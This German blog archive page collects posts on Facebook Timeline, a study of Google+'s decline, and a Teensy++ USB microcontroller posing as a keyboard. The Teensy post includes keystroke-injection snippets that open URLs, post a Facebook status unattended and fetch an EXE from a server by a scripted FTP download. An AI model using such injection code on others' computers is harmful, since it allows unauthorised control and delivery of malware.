Schlagwort-Archiv: Facebook

Facebook ist wie deine Mutter

Ring, ring, ring! Wer kennt es nicht noch aus seiner Jugend…
Das Handy klingelt, am anderen Ende eine besorgte Mutter: “Wo bist du? Wann kommst du nach Hause?”

Oder man versucht aus der Türe zu gehen und schon hört man eine Stimme: “Wo gehst du hin? Wer ist alles dabei?”

Doch heute sind es nicht nur besorgte Mütter – auch Facebook gliedert sich nun ein in diese Reihe:

Google+ ist gescheitert

Google Plus wird jedem ein Begriff sein, hoffe ich mal. Als der Facebook-Konkurent neu eröffnet hatte, wurde er überall als das bessere Facebook und unter Optimisten sogar als dessen Tod gehandelt.
Doch eine neue Studie wiederlegt das nun komplett! RJ Metrics hat bei einer Studie von 40’000 zufällig ausgewählten G+ Profilen ausgewertet, dass das Vorzeigeprojekt von Google immer mehr den Bach runtergeht, da die Useraktivitäten und -interaktionen immer weiter zurückgehen.
Google selbst will zu der Studie nichts sagen und weisst alle Anfragen ab, da solche Studien in die Privatsphäre der User eingreifen. Doch:

“Aus den öffentlichen Timelines Schlüsse zu ziehen, ist legitim. Im Vergleich zu den öffentlichen Teilen bei Facebook-Profilen passiert bei G+ gar nichts, das wird im privaten Bereich nicht anders sein. User, die wirklich Wert auf Privatsphäre legen, verwenden nämlich weder G+ noch Facebook. G+ ist den Usern egal, das ist aus der Auswertung der Like-Buttons auf Internetseiten ersichtlich. Wenn der Facebook-Knopf schon dreistellige Klickraten erreicht, kommt das Google-Pendant noch nicht einmal auf zwei Stellen. G+ ist als soziales Netzwerk gescheitert”, sagt Gerald Bäck, Geschäftsführer der Social-Media-Agentur digital affairs.

Herausgefunden hat RJ Metrics, dass die mehr als 70’000 untersuchten Postings im Schnitt weniger als ein +1 und weniger als ein Kommentar bekommt. Weiterverbreitet wird fast bis gar nichts!

Doch wenn G+ nun so vor sich hintummelt, dann ist das nicht nur ein weiteres halbtotes Netzwerk, sondern kann über kurz oder lang auch zu einem Problem werden. Da das Netzwerk sehr eng mit den Suchergebnissen von Google selbst verknüpft ist, sieht Gerald Bäck Probleme mit der Objektivität:

“Wenn mich eine Suche nach Britney Spears auf ihre seit Monaten nicht aktualisierte G+-Seite bringt, statt zu ihrem Facebook-Profil, wo sich tausende Fans tummeln, ist das eine Verschlechterung der Suchergebnisse”.

Ich persönlich sehe sehr viel von mir selbst in den Ergebnissen der Studie. Selbst besitze ich ein Facebook und ein G+ Profil, verbringe aber mehr als das 10-fache der Zeit auf Facebook als auf G+. Auch bekomme ich von Facebook etwa um den selben Faktor mehr Kommentare und Reaktionen als bei G+…

[Quelle]

Wie deaktiviere ich die Facebook Chronik?

Nun um es vorweg zu nehmen, gar nicht! Einmal aktiviert kann das ganze nicht mehr deaktiviert werden… Oder etwa doch? Genau, eine Lösung gibt es nämlich die garantiert funktioniert: Lösche dein Facebook-Profil.
Auch wenn das nun nicht gerade die Lösung ist, welche alle hören möchten, ist es doch die einzige Lösung! Selbst wenn im Netz einzelne Seiten existieren, welche vorgeben DIE Lösung gefunden zu haben, handelt es sich dabei nur um Abzocker oder mit Viren verseuchte Seiten. Also Finger weg!

So bleibt nichts anderes übrig, als mit der Chronik zu leben, oder aber die Konsequenzen zu ziehen. Und seinen wir mal ehrlich: Das gesamte Leben eines Facebook-Users einsehen konnte man auch schon zu Zeiten vor der Chronik. Es war nur nicht ganz so schön aufbereitet ;)
Und langfristig hilft die Zeit sicher auch, denn hält die schlechte Resonanz der Facebook Chronik weiter an, so wird Facebook früher oder später klein beigeben.

Der Alptraum für jeden Computer

Heute ist mein Teensy++ 2.0 endlich aus der USA rübergeflogen gekommen. Bestellen konnte ich ihn nur noch da, da er weder in der Schweiz, noch in Deutschland oder sonst wo aus Europa noch bestellt werden konnte. Aber da der Dollar-Kurs zur Zeit ja alles andere als hoch ist, hat sich die Bestellung natürlich mehrfach gelohnt!
Doch obwohl ich mir nicht sicher war, ob überhaupt etwas ankommt, dauerte es nicht mal eine Woche seit meiner Bestellung. Und das trotz den prophezeiten 3 Wochen Wartezeit :)

Der Teensy++ ist ein kleiner Mikrocontroller mit USB-Anschluss, mit dem man viele lustige Dinge machen kann. So kann er auf einem Computer als Tastatur erkannt werden und dadurch natürlich auch alles steuern, was man über eine normale Tastatur auch kann *hrhrhr* :D Eine Einschränkung durch Sicherheitssoftware o.ä. gibt es (noch) nicht.

Um mal zu sehen, was man mit dem kleinen Ding alles machen kann, habe ich mir ein paar Beispiele angesehen. Dies geht vom Öffnen einer Seite:

CommandAtRunBarMSWIN("cmd /c start http://blog.encodingit.ch");

… zum Absetzen einer Statusmeldung auf Facebook:

void loop()
{
  CommandAtRunBarMSWIN("cmd /c start http://m.facebook.com");
  delay(6000);
  PressAndRelease(KEY_TAB, 8);
  Keyboard.print("Bits, Bytes and my 5 cents is best!");
  PressAndRelease(KEY_TAB, 1);
  PressAndRelease(KEY_ENTER, 1);
}

… oder gleich zum Nachladen von weiteren Daten via FTP:

void loop()
{
  CommandAtRunBarMSWIN("echo USER >> go.txt ");
  CommandAtRunBarMSWIN("echo PASSWORD >> go.txt ");
  CommandAtRunBarMSWIN("echo GET EXE >> go.txt ");
  CommandAtRunBarMSWIN("echo bye >> go.txt ");
  CommandAtRunBarMSWIN("ftp -s:go.txt " + server);
  CommandAtRunBarMSWIN("del go.txt");
}

Somit ist das ganze nur durch die eigene Phantasie begrenzt :)

Besonders interessant fand ich die Statusmeldung von Facebook. Doch wie es sich gezeigt hat, ist das ganze alles andere als Zuverlässig. Das ganze funktioniert nur, wenn keine Geburtstage oder “Stupser” im Weg sind.

Also habe ich mich mal daran gemacht, das ganze ein bisschen zu verbessern.

Weiterlesen